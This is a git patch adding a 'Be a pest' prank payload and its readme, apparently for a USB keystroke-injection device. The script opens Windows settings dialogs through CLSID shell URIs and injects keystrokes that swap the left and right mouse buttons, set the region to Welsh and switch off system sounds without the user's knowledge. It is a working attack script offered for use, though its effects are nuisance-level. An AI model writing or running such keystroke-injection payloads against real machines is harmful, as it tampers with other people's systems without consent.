From 8185b9704603646ac803bf084ae6bfac8df5ac6b Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Wed, 22 Jun 2022 20:34:14 +0100 Subject: [PATCH] New Payload - Be a pest (#535) * New Payload - Be a pest * Update - Spelling --- .../library/prank/Win_HID_BeAPest/payload.txt | 51 +++++++++++++++++++ .../library/prank/Win_HID_BeAPest/readme.md | 25 +++++++++ 2 files changed, 76 insertions(+) create mode 100644 payloads/library/prank/Win_HID_BeAPest/payload.txt create mode 100644 payloads/library/prank/Win_HID_BeAPest/readme.md diff --git a/payloads/library/prank/Win_HID_BeAPest/payload.txt b/payloads/library/prank/Win_HID_BeAPest/payload.txt new file mode 100644 index 00000000..bc07186c --- /dev/null +++ b/payloads/library/prank/Win_HID_BeAPest/payload.txt @@ -0,0 +1,51 @@ +# Title: Be a pest using CLSID +# Description: Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds. +# Author: Cribbit +# Version: 1.0 +# Category: Pranks +# Target: Windows 10 +# Attackmodes: HID + +LED SETUP + +ATTACKMODE HID + +# GET SWITCH_POSITION + +LED ATTACK + +QUACK DELAY 200 +# Swop Mouse buttons L <-> R +RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}" +QUACK DELAY 200 +QUACK SPACE +QUACK DELAY 100 +QUACK ENTER +QUACK DELAY 100 +# Set region to Welsh +RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}" +QUACK DELAY 200 +# Walser (Switzerland) +QUACK w +QUACK DELAY 100 +# Welsh +QUACK w +QUACK DELAY 100 +QUACK ENTER +QUACK DELAY 100 +# Turn off system sounds +RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}" +QUACK DELAY 200 +QUACK SHIFT TAB +QUACK DELAY 100 +QUACK RIGHTARROW +QUACK DELAY 100 +QUACK RIGHTARROW +QUACK DELAY 100 +QUACK TAB +QUACK DELAY 100 +QUACK UPARROW +QUACK DELAY 100 +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/Win_HID_BeAPest/readme.md b/payloads/library/prank/Win_HID_BeAPest/readme.md new file mode 100644 index 00000000..fa0fe60a --- /dev/null +++ b/payloads/library/prank/Win_HID_BeAPest/readme.md @@ -0,0 +1,25 @@ +# Be A Pest Using CLSID +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: General +- Attackmode: HID +- Extensions: Run + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Uses CLSID to open system dialogs. +To swap the left and right mouse button. +Change the region to Welsh. +And turn off system sounds. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Keystrokes | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file